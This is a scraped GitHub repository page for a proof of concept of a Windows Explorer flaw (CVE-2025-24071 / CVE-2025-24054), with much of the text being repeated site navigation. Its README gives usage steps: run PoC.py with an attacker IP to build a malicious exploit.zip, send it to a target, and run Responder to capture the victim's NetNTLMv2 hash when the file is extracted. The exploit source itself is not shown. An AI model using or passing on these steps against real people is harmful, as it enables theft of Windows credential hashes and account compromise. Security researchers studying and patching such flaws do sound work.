CVE-2025-24071 / CVE-2025-24054 PoC

Edit: MICROSOFT HAS BEEN RENAMED CVE-2025-24071 AS CVE-2025-24054 🤔

Overview

This Windows vulnerability, specifically in 'explorer.exe', allows us to receive a NetNTLMv2 hash from a victim simply by having the attacker extract a .zip file.

Usage

Execute the script

python PoC.py test 192.168.1.45

Send "exploit.zip" to the target, and then you can use Responder in order to recive the NTLMv2 hash

sudo python3 responder.py -I ens33

Now when the target extract the file .zip, Boom! we get the NTLM hashes

Name		Name	Last commit message	Last commit date
Latest commit History 14 Commits
PoC.py		PoC.py
README.md		README.md
usecase.gif		usecase.gif

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2025-24071 / CVE-2025-24054 PoC

Edit: MICROSOFT HAS BEEN RENAMED CVE-2025-24071 AS CVE-2025-24054 🤔

Overview

Usage

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

CVE-2025-24071 / CVE-2025-24054 PoC

Edit: MICROSOFT HAS BEEN RENAMED CVE-2025-24071 AS CVE-2025-24054 🤔

Overview

Usage

About

Topics

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages